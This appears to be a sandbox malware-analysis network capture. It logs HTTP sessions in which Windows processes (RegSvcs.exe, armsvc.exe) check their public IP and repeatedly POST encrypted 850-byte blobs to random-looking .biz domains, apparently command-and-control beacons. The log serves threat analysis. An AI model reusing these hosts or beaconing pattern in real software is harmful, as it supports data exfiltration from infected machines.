                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:24:13.134322882 CET850OUTData Raw: 1f 6d 70 8e f0 09 b5 b8 46 03 00 00 b4 59 69 f1 82 37 27 dd e3 c2 6a 3a db 6a 12 1c 42 96 2d 40 f7 59 bf 47 3d ff 4f 93 3f 6c 97 d8 d2 8e ba 7d be b7 50 9c 4c 62 82 fe 6a 09 5b 02 56 14 ae 18 1b fc 8a 0e 31 9b 33 4a 33 cc cb b4 5f a1 ce 4b 4c 3a
                                                                                                                                                  Data Ascii: mpFYi7'j:jB-@YG=O?l}PLbj[V13J3_KL:GO=9FmpC'{ue"]0V0>UAdJ[B\h9~-A'g=Q6]xkA)Nb-f)$Vf>,CBJw%Q[']t
                                                                                                                                                  Dec 10, 2024 16:24:14.474680901 CET413INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:14 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=29de6c1007c751a72c85120a3480a41f|8.46.123.175|1733844254|1733844254|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.749708193.122.6.168802724C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:14.544823885 CET151OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Dec 10, 2024 16:24:15.817994118 CET321INHTTP/1.1 200 OK
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:15 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Request-ID: daa271d8caefb955d4e0a3a7dd57b23f
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                                                                  Dec 10, 2024 16:24:15.823390961 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Dec 10, 2024 16:24:16.229127884 CET321INHTTP/1.1 200 OK
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:16 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Request-ID: 801637083f0acea40bf13f0b66973778
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                                                                  Dec 10, 2024 16:24:23.931077003 CET127OUTGET / HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                  Dec 10, 2024 16:24:24.335911989 CET321INHTTP/1.1 200 OK
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:24 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 104
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  X-Request-ID: 0cb2bb90e36cfeca33f9b72364920757
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.74970918.141.10.107806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:15.244730949 CET346OUTPOST /udp HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: ssbzmoy.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:24:15.244730949 CET850OUTData Raw: ea 44 5f 04 e3 cf a4 c8 46 03 00 00 e3 bd 46 bb 46 6a 25 d2 a0 24 aa eb 50 bf 14 c7 b6 68 82 b9 48 b0 fd 9a 85 77 17 a4 46 26 77 f2 53 5d 44 a0 a1 79 a4 e9 70 46 01 90 6c 02 9e 4e bf 64 7b 3d 7d 37 9a 14 65 e3 50 b6 91 9e f4 83 20 37 01 33 18 36
                                                                                                                                                  Data Ascii: D_FFFj%$PhHwF&wS]DypFlNd{=}7eP 736&OjnR*r&6QOi2%A{TU62h]}{pCvY((JTQ,%0~773)b4"<e*C{0OKT0{TJx)xfy$
                                                                                                                                                  Dec 10, 2024 16:24:17.245935917 CET411INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:16 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=18b7adbf3b884eb70f95b61fc4681eda|8.46.123.175|1733844256|1733844256|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.74971654.244.188.177806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:18.081989050 CET353OUTPOST /hfsfqfqbrwib HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: cvgrf.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:24:18.082005024 CET850OUTData Raw: 7a c3 bc 44 82 b7 ff 60 46 03 00 00 5c ef b5 f7 08 1b 79 dc 94 e0 69 10 91 59 8f 4c 71 f5 c9 41 ea 53 42 1e 2c b7 ac f1 62 7f f0 cb 86 a8 b1 aa 6d 72 ee 3a 13 92 0a 1c 64 98 0c 5d e4 97 04 6e 8d 8a 3e 2e cf 0f f2 c4 f4 80 26 df e4 c6 25 70 5d 16
                                                                                                                                                  Data Ascii: zD`F\yiYLqASB,bmr:d]n>.&%p]RdTBW7'4T4S2|:sU1w4pi$_" L9rc"UjK{%avwXno~A+uS-Q']koX2SFv5S[xK*DO"=*cmoC[
                                                                                                                                                  Dec 10, 2024 16:24:19.430260897 CET409INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:19 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=96ffce8178e8ca5aff1049ce61b5f9aa|8.46.123.175|1733844259|1733844259|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.74972744.221.84.105806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:21.235524893 CET346OUTPOST /bd HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: npukfztj.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:24:21.235548973 CET850OUTData Raw: a2 4c 99 c2 47 28 ea 64 46 03 00 00 ec 42 78 62 b6 76 ad 5f b2 de 68 8c a7 ac 6d 38 8c 6f 4b eb 13 93 5a 6a a4 00 ba 51 2d e9 a6 2d 57 19 1a 6a 32 ba 2a b7 5c 03 b9 b7 32 d4 1e 9f 23 cf bf 26 61 26 55 ef 35 22 6e e1 bf e9 69 19 4d 47 b1 0e c5 cb
                                                                                                                                                  Data Ascii: LG(dFBxbv_hm8oKZjQ--Wj2*\2#&a&U5"niMGy8k2m[Hjs@!arI^JD/e`y<$UmwbJs95-;YESGLa10yjS%gsEY%9z8@5N>2^P]6-b+|
                                                                                                                                                  Dec 10, 2024 16:24:22.325201988 CET412INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:22 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: btst=512f2f680bc47f5048d2cb9aeb2c66a8|8.46.123.175|1733844262|1733844262|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                  Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.749734172.234.222.138806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:23.080528021 CET351OUTPOST /opymuwnb HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: przvgke.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:24:23.080619097 CET850OUTData Raw: d5 65 48 9b 9f c6 28 2d 46 03 00 00 3a c1 fc e4 28 af d0 9a f4 1a 2c 13 6f e1 76 6d cb 8d 61 ca 05 12 0b 03 ed b2 14 ef 40 14 05 63 b2 2e 6f 69 7b 8d 53 6e 9d 3d 12 00 bd 74 de 06 c4 3b fa b1 e2 7b 62 06 69 70 c6 bf 8e a1 57 6a 5a 02 c1 65 5d 0a
                                                                                                                                                  Data Ascii: eH(-F:(,ovma@c.oi{Sn=t;{bipWjZe]4AvqELa<Y88'`C5fC m_X#NrLv;D>}/8eu:< T&}nF`YBfm9qM53
                                                                                                                                                  Dec 10, 2024 16:24:24.217123032 CET470INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:24 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 142
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                  Location: http://ww99.przvgke.biz/opymuwnb
                                                                                                                                                  Cache-Control: no-store, max-age=0
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                  Dec 10, 2024 16:24:28.568732977 CET349OUTPOST /meqybx HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: przvgke.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
                                                                                                                                                  Dec 10, 2024 16:24:28.568873882 CET850OUTData Raw: 65 a5 d9 91 da 61 9a b1 46 03 00 00 cf 2e 4a b6 f0 1d ad 3f f2 d3 1c 2e c5 3a a1 5a 26 93 57 00 d7 2f ad d5 0d 4c a8 9c 5f 0c df 57 45 5e 5d db bb 8e 8d 1f 72 55 64 eb ca de 2e 0c 46 2f b0 5e 56 2d d9 a1 53 e5 dd 42 49 10 31 89 4a bb 48 38 5c 0c
                                                                                                                                                  Data Ascii: eaF.J?.:Z&W/L_WE^]rUd.F/^V-SBI1JH8\!J)&r`ile",Gkr8PvM;LW?[AO,kV1N*2"YW-|Xv4 }'qH~jnN*HAa`T#>|RCO/y\M**p@


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.74974172.52.179.174806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:25.179752111 CET334OUTGET /opymuwnb HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Host: ww99.przvgke.biz
                                                                                                                                                  Dec 10, 2024 16:24:26.348642111 CET282INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:26 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 0
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Location: http://ww12.przvgke.biz/opymuwnb?usid=26&utid=9416579686
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Access-Control-Allow-Origin: *


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  8192.168.2.74974576.223.26.96806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:26.908724070 CET358OUTGET /opymuwnb?usid=26&utid=9416579686 HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Host: ww12.przvgke.biz
                                                                                                                                                  Dec 10, 2024 16:24:28.200849056 CET825INHTTP/1.1 200 OK
                                                                                                                                                  Accept-Ch: viewport-width
                                                                                                                                                  Accept-Ch: dpr
                                                                                                                                                  Accept-Ch: device-memory
                                                                                                                                                  Accept-Ch: rtt
                                                                                                                                                  Accept-Ch: downlink
                                                                                                                                                  Accept-Ch: ect
                                                                                                                                                  Accept-Ch: ua
                                                                                                                                                  Accept-Ch: ua-full-version
                                                                                                                                                  Accept-Ch: ua-platform
                                                                                                                                                  Accept-Ch: ua-platform-version
                                                                                                                                                  Accept-Ch: ua-arch
                                                                                                                                                  Accept-Ch: ua-model
                                                                                                                                                  Accept-Ch: ua-mobile
                                                                                                                                                  Accept-Ch-Lifetime: 30
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Date: Tue, 10 Dec 2024 15:24:27 GMT
                                                                                                                                                  Server: Caddy
                                                                                                                                                  Server: nginx
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_MPQJD7SRwpp/8H9LKWnZYJxk63xeOqMMtEr2RLq1GtBUUYPh4MOXtEZv71h8VpGGTyYyMzFxIAAJPJlDrFLM9A==
                                                                                                                                                  X-Domain: przvgke.biz
                                                                                                                                                  X-Pcrew-Blocked-Reason:
                                                                                                                                                  X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                  X-Subdomain: ww12
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Dec 10, 2024 16:24:28.201351881 CET1236INData Raw: 33 64 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                  Data Ascii: 3db8<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_MPQJD7SRwpp/8H9LKWnZYJxk63xeOqMMtEr2RLq1GtBUUYPh4MOXtEZv71h8VpGGTyYyM
                                                                                                                                                  Dec 10, 2024 16:24:28.202661991 CET1236INData Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
                                                                                                                                                  Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radiu
                                                                                                                                                  Dec 10, 2024 16:24:28.202676058 CET1236INData Raw: 3b 0a 7d 0a 0a 2e 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 32 72 65 6d 20 31 72 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 72 65 6d 3b 0a 20 20 20 20
                                                                                                                                                  Data Ascii: ;}.footer { color:#626574; padding:2rem 1rem; font-size:.8rem; margin:0 auto; max-width:440px;}.footer a:link,.footer a:visited { color:#626574;}.sale_link_bold a,.sale_link,.sale_link a { color:#626574
                                                                                                                                                  Dec 10, 2024 16:24:28.205384970 CET1236INData Raw: 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 31 37 2c 20 33 38 2c 20 37 37 29 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a
                                                                                                                                                  Data Ascii: tom: 20px; background-color: rgb(17, 38, 77); text-decoration-line: none; font-size: 18px; font-weight: 700; color: #ffffff; text-align: left;}.fallback-arrow { float: right; width: 24px; height: 24px;
                                                                                                                                                  Dec 10, 2024 16:24:28.205398083 CET1236INData Raw: 61 6d 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 70 72 7a 76 67 6b 65 2e 62 69 7a 3c 2f 68 31 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                  Data Ascii: ame"> <h1>przvgke.biz</h1> </div> <div class="tcHolder"> <div id="tc"></div> </div> </div> </div> <div class="footer"> 2024 Copyright. All Rig
                                                                                                                                                  Dec 10, 2024 16:24:28.208373070 CET1236INData Raw: 20 20 20 20 20 20 27 74 79 70 65 27 3a 20 27 73 65 61 72 63 68 62 6f 78 27 2c 0a 20 20 20 20 20 20 20 20 27 66 6f 6e 74 53 69 7a 65 53 65 61 72 63 68 49 6e 70 75 74 27 3a 20 31 32 2c 0a 20 20 20 20 20 20 20 20 27 68 69 64 65 53 65 61 72 63 68 49
                                                                                                                                                  Data Ascii: 'type': 'searchbox', 'fontSizeSearchInput': 12, 'hideSearchInputBorder': false, 'hideSearchButtonBorder': true, 'fontSizeSearchButton': 13, 'colorBackground': 'transparent', 'colorSearchBut
                                                                                                                                                  Dec 10, 2024 16:24:28.208412886 CET1236INData Raw: 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 3f 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 20 2b 20 27 26 27 20 3a 20 27 3f 27 29 20 2b 20 27 5f 78 61 66 76 72 3d 4d 32 55 33 59 7a 42 6c 4e 44 63 34 59 6a 51 7a 4f 44 63 77 5a 6a 45 79 4f 44 6b
                                                                                                                                                  Data Ascii: cation.search ? location.search + '&' : '?') + '_xafvr=M2U3YzBlNDc4YjQzODcwZjEyODk1ZTlmZTUxNzU2MmI1Y2I1MzEwNyw2NzU4NWQyYmU4Zjk1'; }let pageLoadedCallbackTriggered = false;let fallbackTriggered = false;let formerCalledArguments = false;let page
                                                                                                                                                  Dec 10, 2024 16:24:28.211345911 CET1236INData Raw: 20 27 76 69 73 69 62 6c 65 27 3b 70 61 67 65 4c 6f 61 64 65 64 43 61 6c 6c 62 61 63 6b 54 72 69 67 67 65 72 65 64 20 3d 20 74 72 75 65 3b 69 66 20 28 28 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20 3d 3d 3d 20 74 72 75 65 20 7c 7c 20 73
                                                                                                                                                  Data Ascii: 'visible';pageLoadedCallbackTriggered = true;if ((status.faillisted === true || status.faillisted == "true" || status.blocked === true || status.blocked == "true" ) && status.error_code != 25) {ajaxQuery(scriptPath + "/track.php?domain=" + en
                                                                                                                                                  Dec 10, 2024 16:24:28.211359978 CET1236INData Raw: 20 3d 3d 20 22 74 72 75 65 22 29 20 7b 61 6a 61 78 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61
                                                                                                                                                  Data Ascii: == "true") {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult === true || status.adult == "true") && !isAdult) {ajaxQuery(scr
                                                                                                                                                  Dec 10, 2024 16:24:28.320898056 CET1236INData Raw: 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 67 6c 65 3d
                                                                                                                                                  Data Ascii: y(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=answercheck&answer=rejected&uid=" + encodeURIComponent(uniqueTrackingID));}}};let x = function (obj1, obj2) {if (typeof obj1 != "object")obj1 = {};for (let key i


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  9192.168.2.74975618.141.10.107806336C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Dec 10, 2024 16:24:30.030884027 CET352OUTPOST /tydyiliq HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Host: knjghuig.biz
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                  Content-Length: 850
